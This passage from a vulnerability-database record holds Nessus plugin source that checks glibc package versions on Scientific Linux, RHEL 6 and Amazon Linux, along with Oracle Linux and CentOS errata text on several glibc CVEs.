i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. 
(CVE-2011-1089)\n\nThis update also fixes several bugs and adds various enhancements.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1112&L=scientific-linux-errata&T=0&P=2038\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74c276b9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"glibc-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-devel-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-static-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:10:04", "description": "Updated glibc packages that fix two 
security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. 
(CVE-2011-1089)\n\nRed Hat would like to thank Dan Rosenberg for reporting the\nCVE-2011-1089 issue.\n\nThis update also fixes several bugs and adds various enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document, linked to in the References\nsection.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.", "edition": 29, "published": "2011-12-06T00:00:00", "title": "RHEL 6 : glibc (RHSA-2011:1526)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "modified": "2011-12-06T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2011-1526.NASL", "href": "https://www.tenable.com/plugins/nessus/57011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1526. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57011);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\");\n script_bugtraq_id(46740);\n script_xref(name:\"RHSA\", value:\"2011:1526\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2011:1526)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix two security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. 
(CVE-2011-1089)\n\nRed Hat would like to thank Dan Rosenberg for reporting the\nCVE-2011-1089 issue.\n\nThis update also fixes several bugs and adds various enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document, linked to in the References\nsection.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1089\"\n );\n # https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?056c0c27\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1526\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1526\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", 
reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T01:20:59", "description": "An integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. 
(CVE-2011-4609)", "edition": 25, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : glibc (ALAS-2012-39)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc-debuginfo", "p-cpe:/a:amazon:linux:glibc-devel", "p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-static", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:glibc-headers"], "id": "ALA_ALAS-2012-39.NASL", "href": "https://www.tenable.com/plugins/nessus/69646", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-39.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69646);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2011-4609\");\n script_xref(name:\"ALAS\", value:\"2012-39\");\n script_xref(name:\"RHSA\", value:\"2012:0058\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2012-39)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. 
(CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-39.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update glibc' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-common-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-static-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nscd-2.12-1.47.32.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / 
glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:23", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "[2.5-65.el5_7.3]\n- Use correct type when casting d_tag (#767687)\n- Report write error in addmnt even for cached streams (#767687)\n- ldd: Never run file directly (#767687).\n- Workaround misconfigured system (#767687)\n[2.5-65.el5_7.2]\n- Check values from TZ file header (#767687)", "edition": 4, "modified": "2012-02-13T00:00:00", "published": "2012-02-13T00:00:00", "id": "ELSA-2012-0126", "href": "http://linux.oracle.com/errata/ELSA-2012-0126.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:14", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "[2.3.4-2.57]\n- Use malloc as needed in fnmatch (#769360)\n[2.3.4-2.56]\n- Fix handling of newline in addmntent (#769360)\n- Use correct type when casting d_tag (#769360).\n- Properly quote output of locale (#769360)\n- Check size of pattern in wide character representation in fnmatch (#769360)\n- Report write error in addmnt even for cached streams (#769360)\n- ldd: Never run file directly (#769360).\n- Check values from TZ file header (#767685)\n- Workaround misconfigured system (#767685)\n[2.3.4-2.55]\n- Require exact glibc version in nscd (#657009)", "edition": 4, "modified": "2012-02-13T00:00:00", "published": "2012-02-13T00:00:00", "id": "ELSA-2012-0125", "href": "http://linux.oracle.com/errata/ELSA-2012-0125.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-05-29T18:36:53", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "description": "[2.12-1.47]\n- Don't start AVC thread until credentials are installed (#700507)\n[2.12-1.46]\n- Update systemtaparches\n[2.12-1.45]\n- Update configure script\n[2.12-1.44]\n- Add gdb hooks (#711927)\n[2.12-1.43]\n- Don't assume AT_PAGESIZE is always available (#739184)\n- Define IP_MULTICAST_ALL (#738763)\n[2.12-1.42]\n- Avoid race between {,__de}allocate_stack and __reclaim_stacks during\n fork (#738665)\n[2.12-1.41]\n- Locale-independent parsing in libintl (#737778)\n[2.12-1.40]\n- Change setgroups to affect all the threads in the process (#736346)\n[2.12-1.39]\n- Make sure AVC thread has capabilities (#700507)\n- Fix memory leak in dlopen with RTLD_NOLOAD (#699724)\n[2.12-1.38]\n- Build libresolv with stack protector (#730379)\n[2.12-1.37]\n- Maintain stack alignment when cancelling threads (#731042)\n[2.12-1.36]\n- Fix missing debuginfo (#729036)\n[2.12-1.35]\n- Report write error in addmnt even for cached streams (#688980,\n CVE-2011-1089)\n- Handle Lustre filesystem (#712248)\n[2.12-1.34]\n- Query NIS domain only when needed (#718057)\n- Update: Use mmap for allocation of buffers used for __abort_msg\n (#676591)\n[2.12-1.33]\n- Don't use gethostbyaddr to determine canonical name (#714823)\n[2.12-1.32]\n- ldd: never run file directly (#713134)\n[2.12-1.31]\n- Support Intel processor model 6 and model 0x2c (#695595)\n- Optimize memcpy for SSSE3 (#695812)\n- Optimize strlen for SSE2 (#695963)\n[2.12-1.30]\n- Support f_flags in Linux statfs implementation (#711987)\n[2.12-1.29]\n- Avoid overriding CFLAGS (#706903)\n[2.12-1.28]\n- Use mmap for allocation of buffers used for __abort_msg (#676591)\n[2.12-1.27]\n- Fix PLT use due to __libc_alloca_cutoff\n- Schedule nscd cache pruning more accurately from re-added values\n (#703481)\n- Fix POWER4 optimized strncmp to not read past differing bytes\n (#694386)\n[2.12-1.26]\n- Create debuginfo-common on biarch 
platforms (#676467)\n- Use Rupee sign in Indian locales (#692838)\n- Signal temporary host lookup errors in nscd as such to the requester\n (#703480)\n- Define initgroups callback for nss_files (#705465)", "edition": 4, "modified": "2011-12-14T00:00:00", "published": "2011-12-14T00:00:00", "id": "ELSA-2011-1526", "href": "http://linux.oracle.com/errata/ELSA-2011-1526.html", "title": "glibc security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:11", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "description": "[2.12-1.47.el6_2.5]\n- Avoid high cpu usage when accept fails with EMFILE (#767692)\n[2.12-1.47.el6_2.4]\n- Make implementation of ARENAS_TEST and ARENAS_MAX match\n documentation (#769594)\n- Check malloc arena atomically (#769594)\n[2.12-1.47.el6_2.3]\n- Check values from TZ file header (#767692)\n[2.12-1.47.el6_2.2]\n- Correctly reparse group line after enlarging the buffer\n (#766484)\n[2.12-1.47.el6_2.1]\n- Fix grouping and reuse other locales in various locales (#754116)", "edition": 4, "modified": "2012-01-24T00:00:00", "published": "2012-01-24T00:00:00", "id": "ELSA-2012-0058", "href": "http://linux.oracle.com/errata/ELSA-2012-0058.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:27:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0126\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. 
Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. 
